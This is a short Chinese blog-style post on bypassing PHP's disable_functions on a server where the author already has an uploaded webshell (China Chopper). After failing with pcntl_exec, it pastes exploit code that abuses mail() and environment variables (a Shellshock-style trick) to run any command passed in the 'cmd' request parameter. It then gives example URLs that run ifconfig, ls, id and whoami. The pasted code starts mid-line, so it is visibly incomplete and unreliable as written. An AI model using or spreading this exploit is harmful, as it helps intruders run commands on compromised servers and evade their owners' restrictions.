利用ld_preload方式绕过disable_functions

参考链接：https://github.com/l3m0n/Bypass_Disable_functions_Shell

连了菜刀无法执行命令系列。

去看phpinfo(别问我怎么看，你都能上传一句话了，phpinfo不是问题

好家伙！禁用了这么多函数，这可咋整

行我去找方法了，

试过了pcntl_exec的方法，没有成功，来用ld_preload绕过（mail

啥也别说了，上马

$tmp 2>&1");
	// In Safe Mode, the user may only alter environment variableswhose names
	// begin with the prefixes supplied by this directive.
	// By default, users will only be able to set environment variablesthat
	// begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive isempty,
	// PHP will let the user modify ANY environment variable!
	mail("[email protected]", "", "", "", "-bv"); // -bv so we don't actuallysend any mail
	$output = @file_get_contents($tmp);
	@unlink($tmp);
	if ($output != "") {
		return $output;
	} else {
		return "No output, or not vuln.";
	}

}
echo shellshock($_REQUEST["cmd"]);
?>

当然啦，是大佬写的，名字保留。

执行方式当然是要打全路径

比如(前边网址自行添加

exp.php?cmd=/sbin/ifconfig

exp.php?cmd=/bin/ls

exp.php?cmd=/usr/bin/id

exp.php?cmd=/usr/bin/whoami

不客气~